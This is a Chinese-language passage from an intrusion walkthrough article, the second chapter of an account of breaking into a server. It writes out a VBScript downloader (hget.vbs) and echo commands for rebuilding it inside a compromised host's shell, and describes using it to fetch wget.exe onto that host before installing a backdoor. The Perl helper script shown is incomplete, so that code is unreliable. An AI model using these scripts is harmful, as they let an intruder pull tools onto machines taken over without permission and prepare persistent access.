第二章 梦醒时分
在我证实了肉鸡上的cscript.exe还是可用的后(不信管理员还能把它也干掉?),决定还是把思路放到vbs上。要找一个既可以上传又不需要"&"的vbs……对了!!记得在灰色看到过一个vbs脚本叫iget.vbs可以用XMLHTTP对象使用http将一个文件下载到本地!!于是赶紧的找到iget.vbs看看,发现代码挺长而且也有"&"。再仔细阅读代码后发现,真正实现下载功能的就那么几行我整理成一个hget.vbs,内容如下:
On Error Resume Next
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
|
哈哈!!不错!代码不长,而且也没有"&"!!不过似乎还是长了点,用echo命令一个一个来还是显得麻烦。于是又想了一个办法,用perl写了一个脚本echo.pl,内容如下:
#!usr/bin/perl -w
close MINE;
close TEMP;
这样,我在cmd下输入echo.pl hget.vbs回车后(当然你必须安装了activeperl),就会在同目录下生成一个done.txt,内容如下:
echo On Error Resume Next >>hget.vbs
echo Dim iRemote,iLocal >>hget.vbs
echo iLocal=LCase(WScript.Arguments(1)) >>hget.vbs
echo iRemote=LCase(WScript.Arguments(0)) >>hget.vbs
echo Set xPost=createObject("Microsoft.XMLHTTP") >>hget.vbs
echo xPost.Open "GET",iRemote,0 >>hget.vbs
echo xPost.Send() >>hget.vbs
echo Set sGet=createObject("ADODB.Stream") >>hget.vbs
echo sGet.Mode = 3 >>hget.vbs
echo sGet.Type = 1 >>hget.vbs
echo sGet.Open() >>hget.vbs
echo sGet.Write(xPost.responseBody) >>hget.vbs
echo sGet.SaveToFile iLocal,2 >>hget.vbs
|
这样就方便多了,然后我就可以全部复制,然后在肉鸡的shell里单击鼠标右键就搞定了!如图五。
哈哈成功写入!!赶紧的试试看是否可以用如图六。
程序停止了一段时间(这段时间要看你的要下载的东东的大小了)。看到了嘛,那个wget.exe乖乖地躺在那呢(wget.exe是个cmd下的下载工具,为什么要下载它呢?因为那个hget.vbs毕竟不太好用,所以下个wget.exe方便点)。好了!!一切似乎顺利得多了!下一步该找一个好的后门了。
上一页 [1] [2] [3] 下一页
查看更多与记一次完整入侵过程(图)相关内容
设为首页
加入收藏
联系我们
您当前的位置:
减小字体
增大字体
